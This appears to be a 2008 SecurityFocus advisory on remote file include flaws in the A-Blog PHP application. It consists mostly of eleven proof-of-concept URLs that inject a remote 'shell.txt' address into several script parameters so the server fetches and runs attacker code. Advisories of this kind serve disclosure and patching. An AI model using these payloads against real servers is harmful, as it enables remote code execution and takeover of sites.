Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

A-Blog Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/A-Blog/sources/myaccount.php?open_box=http://shell.txt?
http://www.example.com/A-Blog/sources/myaccount.php?middle_box=http://shell.txt?
http://www.example.com/A-Blog/sources/myaccount.php?close_box=http://shell.txt?
http://www.example.com/A-Blog/navigation/search.php?navigation_end=http://shell.txt?
http://www.example.com/A-Blog/navigation/donation.php?navigation_start=http://shell.txt?
http://www.example.com/A-Blog/navigation/donation.php?navigation_middle=http://shell.txt?
http://www.example.com/A-Blog/navigation/donation.php?navigation_end=http://shell.txt?
http://www.example.com/A-Blog/navigation/latestnews.php?navigation_start=http://shell.txt?
http://www.example.com/A-Blog/navigation/latestnews.php?navigation_middle=http://shell.txt?
http://www.example.com/A-Blog/navigation/links.php?navigation_start=http://shell.txt?
http://www.example.com/A-Blog/navigation/links.php?navigation_middle=http://shell.txt?







 

Privacy Statement
Copyright 2008, SecurityFocus